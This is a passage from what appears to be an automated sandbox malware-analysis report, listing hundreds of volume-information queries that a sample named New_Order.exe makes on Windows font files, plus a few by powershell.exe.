            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
